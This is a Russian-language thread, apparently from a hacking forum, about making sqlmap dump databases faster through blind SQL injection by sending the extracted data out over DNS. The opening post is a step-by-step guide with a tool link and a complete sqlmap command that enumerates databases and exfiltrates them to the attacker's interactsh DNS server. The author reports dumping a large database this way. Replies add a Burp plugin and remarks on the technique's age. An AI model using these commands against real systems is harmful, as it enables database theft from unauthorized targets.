• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Ускоряем скулю через dns-exfiltration

r4cket3er

RAID-массив
Пользователь
Регистрация
10.10.2024
Сообщения
92
Реакции
44
Здарова, недавно наткнулся на очень интересный параметр sqlmap, а именно - --dns-domain. Сразу побежал гуглить, и узнал, что оказывается sqlmap дает возможность производить эксфильтрацию данных через dns.
Т.е. мапа буквально отправлять данные из таблиц на ваш dns сервер.
1739718489423.png

Я тестировал на практике это только на Windows Server, но результат был прекрасным. Мапа сдампила очень большую базу за рекордно короткое время.
Таким советую пользоваться, если у вас есть медленная (time, boolean) скуля. Ниже приведу гайд, как все настроить.

1) Скачиванием приложение на go - https://github.com/unlock-security/sqlmapsh
2) Запускаем его так же как вы запускаете обычную мапу, вписывая те же параметры за исключением самого названия sqlmap, его мы меняем на sudo sqlmapsh.
Пример: sudo sqlmapsh -r ~/request --level=3 --risk=3 --random-agent -v 3 --batch --dbs --technique=T

Приложение автоматически настроит ваш днс сервер через interactsh.
 
Хотя бы лайк мне под пост на эксплоите кинул)
Я не буду спорить с тобой, контент-мейкер с эксплоита. Об этой фитче я узнал без твоей помощи. Но и твою тему на экспе я видел.
 
Последнее редактирование:
Все есть в официальном мануале.
И плагин для бурпа, для удобства. https://github.com/portswigger/sqlmap-dns-collaborator (SQLMap DNS Collaborator в BApp Store).
 
Последнее редактирование:
Этой технике 10 лет.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх